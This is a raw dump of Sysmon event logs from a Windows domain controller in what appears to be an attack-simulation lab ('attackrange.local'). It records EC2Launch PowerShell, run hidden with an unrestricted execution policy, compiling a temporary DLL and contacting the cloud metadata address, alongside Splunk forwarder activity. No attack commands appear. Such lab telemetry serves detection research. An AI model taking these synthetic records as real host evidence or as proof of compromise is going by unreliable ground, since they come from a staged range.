12:02:46.605{266CAFBE-64E6-6064-BD00-00000000AE01}6496ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES16D.tmpMD5=4B6C4475E468877B5EF417C9B6536934,SHA256=973585701AB90808F44D4481764D21C004E675DDADDCA72B2155130A5AF54A46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:46.559{266CAFBE-64E6-6064-BE00-00000000AE01}2904ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES16D.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E6-6064-BE00-00000000AE01}2904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:46.543{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:46.543{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-64E6-6064-BE00-00000000AE01}2904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:46.543{266CAFBE-64E6-6064-BD00-00000000AE01}64966504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{266CAFBE-64E6-6064-BE00-00000000AE01}2904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.546{266CAFBE-64E6-6064-BE00-00000000AE01}2904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 
"/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES16D.tmp" "c:\Users\Administrator\AppData\Local\Temp\apa15htr\CSCD82B1FD6BFA44FE3AD706A9C26EF4E.TMP"C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.cmdline" 10341000x80000000000000007875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:46.247{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:46.247{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:46.247{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-64E2-6064-BC00-00000000AE01}68606984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\
System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d9461|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d886a|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\248750a67803cf70fc202269b0f06183\Microsoft.PowerShell.Commands.Utility.ni.dll+ee5a8940|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\248750a67803cf70fc202269b0f06183\Microsoft.PowerShell.Commands.Utility.ni.dll+ee5a8940|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5ab09530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5b5ab42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aaa009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5ab03b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae5ca0(wow64)|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+16ee92 
154100x80000000000000007868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.208{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.cmdline"C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 11241100x80000000000000007867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.200{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.cmdline2021-03-31 12:02:46.200 11241100x80000000000000007866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:46.200{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.dll2021-03-31 12:02:46.200 10341000x80000000000000007896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:47.649{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a9e0|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:47.260{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFA99F9A8D290B32D2A76A7847042689,SHA256=410CC77407C8E82E00DDB94CE6E2151503BFBBCBDCB1EC3FC128428128648648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:47.120{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E07315041470B742952C75E6EEFF2511,SHA256=755AA96A9244F4AA3FE3F16F5ECD175EE1BFEFEB8E417BB6E185211B2C434010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:47.120{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B5EE7440BF2EE1E00BC65C08BA6FB78,SHA256=D96F7A9D244523D713BF4C663BB6C759748E899E6AECC4B42FBE9571482B2F72,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.990{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\README.txt2021-03-31 12:02:48.990 11241100x80000000000000007903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.990{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\LICENSE.txt2021-03-31 12:02:48.990 354300x80000000000000007902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.959{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53591-false169.254.169.254-80http 354300x80000000000000007901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.938{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53590-false169.254.169.254-80http 23542300x80000000000000007900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.397{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0C59A738E2E9B75E6CCE237519465501,SHA256=6E8EF86BAFA9D0B66651B008C1A2CDC4618B049F9FF6DFF78426494B28BA5A28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.397{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F205DC45370F2F84F004412CD86348EA,SHA256=4FA0206CDCE6E1C15D93D81FF2526D930AC6D826A636D755C232386DF520B347,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.117{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.117{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000007973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.893{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0707D0D06182E4042FE2A22353B3FFB1,SHA256=160709C994908846E73423B42A4F949B56C3D1E8E236A31D307993359E48FB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.878{266CAFBE-64E2-6064-BA00-00000000AE01}6812ATTACKRANGE\AdministratorC:\Windows\system32\cmd.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmdMD5=6F31D86A88379966303FF5E580AC09C9,SHA256=D6EC54010FC20FADFE76B05AE3DDBCAB1C3134F462C4ED615C32B571A2930D38,IMPHASH=00000000000000000000000000000000falsetrue 